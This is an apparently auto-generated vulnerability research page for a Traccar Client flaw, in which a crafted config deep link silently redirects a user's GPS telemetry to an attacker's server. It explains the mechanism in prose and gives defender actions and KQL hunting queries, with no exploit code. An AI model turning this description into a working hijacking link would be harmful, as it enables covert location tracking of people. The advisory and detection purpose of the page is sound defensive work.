Traccar Client is a GPS tracking mobile app for sending location updates to p…

Research page generated from configured evidence sources. Treat this as an analyst workbench: facts are sourced, gaps are labelled, and low-confidence chatter is separated from confirmed evidence.

Executive judgement

• Operational lane: monitor
• Priority score: 30
• Confidence: high
• Exploit status: none — No public exploitation signal captured by the configured pipeline yet.
• Urgent publishable: no
• CISA KEV: No CISA KEV match captured in configured source data at generation time.
• Published/observed: 2026-06-17
• EPSS score: not available

What happened

Traccar Client is a GPS tracking mobile app for sending location updates to private servers using the open-source Traccar platform. In versions 9.7.19 and below, a single crafted deep link can silently hijack all GPS tracking parameters and redirect telemetry to an attacker-controlled server. The app registers a custom org.traccar.client://config deep-link scheme that silently writes attacker-supplied parameters (server URL, device ID, accuracy, distance, and interval) into the app’s persistent configuration with no confirmation, notification, or visual indication. A single crafted link delivered via SMS, email, a webpage, or any installed app can therefore reconfigure the app the moment the victim taps it, with no special permissions required. As a result, an attacker can covertly redirect all of the victim’s GPS telemetry to their own server at maximum precision and frequency, and the change persists across restarts. This gives the attacker continuous, real-time tracking of the victim’s location. This issue has been fixed in version 9.7.20.

Why it matters

• The item was promoted because the pipeline observed: priority score 30, exploit status none, confidence high.
• It has a CVE identifier, so it can be tracked across NVD/CVE.org/vendor/exploit sources.
• No PoC signal was detected by the current pipeline unless shown elsewhere on this page.

Evidence collected

• NVD: nvd

Exploitation and PoC status

• Current automated assessment: No public exploitation signal captured by the configured pipeline yet.
• Public exploit/PoC: No PoC source captured yet by the configured pipeline.
• Exploited in the wild: Not confirmed by configured sources at generation time.
• Ransomware association: No ransomware association captured at generation time.

Publication / validation flags

• no_exploitation_signal

Dark web / low-confidence chatter

• No matching OTX/URLhaus/MalwareBazaar item found in configured low-confidence feeds at generation time.
• This is not proof of absence. It means the current automated sources did not capture relevant underground or malware-feed chatter.

Defender actions

• Ensure all mobile devices using Traccar Client are updated to version 9.7.20 or later from the official app stores.
• For managed devices (MDM), push a configuration profile that sets the server URL and device ID, locking the configuration to prevent changes via deep link.
• Educate users not to click on unsolicited links claiming to be configuration links for tracking apps.

Defender / Sentinel hunting queries

MDE exposure: devices with CVE-2026-48745

Find devices where Microsoft Defender Vulnerability Management reports the CVE.

DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2026-48745"
| project DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, LastSeenTime
| order by VulnerabilitySeverityLevel desc, LastSeenTime desc

MDO email delivery and threat hunt

Find delivered emails matching threat indicators for this campaign/vulnerability.

EmailEvents
| where Timestamp > ago(14d)
| where ThreatTypes has "Phish" or ThreatTypes has "Malware" or Subject has "Traccar" or SenderFromAddress has "Traccar" or SenderMailFromAddress has "Traccar" or Subject has "Client" or SenderFromAddress has "Client" or SenderMailFromAddress has "Client" or Subject has "tracking" or SenderFromAddress has "tracking" or SenderMailFromAddress has "tracking" or Subject has "mobile" or SenderFromAddress has "mobile" or SenderMailFromAddress has "mobile"
| project Timestamp, NetworkMessageId, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, Subject, ThreatTypes, DeliveryAction, LatestDeliveryLocation
| order by Timestamp desc

MDO URL click/safe links hunt

Track clicks on potentially malicious URLs delivered via email for this campaign.

UrlClickEvents
| where Timestamp > ago(14d)
| where IsClickedThrough == 1 or ThreatTypes has "Phish" or Url has "Traccar" or Url has "Client" or Url has "tracking"
| project Timestamp, NetworkMessageId, Url, AccountUpn, Workload, IsClickedThrough, ThreatTypes, ActionType
| order by Timestamp desc

MDE endpoint behaviour hunt

General endpoint hunt for named tooling, malware, or exploit artefacts from the research item. Tune terms with vendor IOCs.

DeviceProcessEvents
| where Timestamp > ago(14d)
| where ProcessCommandLine has "Traccar" or FileName has "Traccar" or FolderPath has "Traccar" or ProcessCommandLine has "Client" or FileName has "Client" or FolderPath has "Client" or ProcessCommandLine has "tracking" or FileName has "tracking" or FolderPath has "tracking" or ProcessCommandLine has "mobile" or FileName has "mobile" or FolderPath has "mobile" or ProcessCommandLine has "sending" or FileName has "sending" or FolderPath has "sending"
| project Timestamp, DeviceName, AccountName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

Exposure validation ideas

• Search asset inventory for affected vendor/product names and any CVE reference.
• Check internet-facing exposure through approved tools only: Shodan/Censys/GreyNoise links below are research starting points, not proof of exposure.
• Prioritise management interfaces, edge devices, identity/control-plane systems, and OT/ICS assets where relevant.

Detection / hunting ideas

• Review vendor logs for authentication failures, privilege changes, unexpected admin activity, and anomalous management-plane access.
• Search SIEM/EDR telemetry for product-specific process names, network services, and newly published indicators from primary sources.
• Monitor for scanner traffic or nuclei/metasploit module references once public exploit tooling appears.

Research links

• NVD
• CVE.org
• CISA KEV search
• GitHub code/advisory search
• GitHub repository search
• Exploit-DB search
• Packet Storm search
• AlienVault OTX search
• GreyNoise search
• Shodan search
• Censys search

Open questions

• Is there a primary vendor advisory with exact affected versions and fixed versions?
• Has CISA KEV, Shadowserver, GreyNoise, or a trusted vendor confirmed exploitation?
• Are there credible PoC repositories or only secondary reporting mentioning PoC?
• Is there underground/forum/leak-site discussion, or only public reporting?

Generated: 2026-06-17T15:39:20+00:00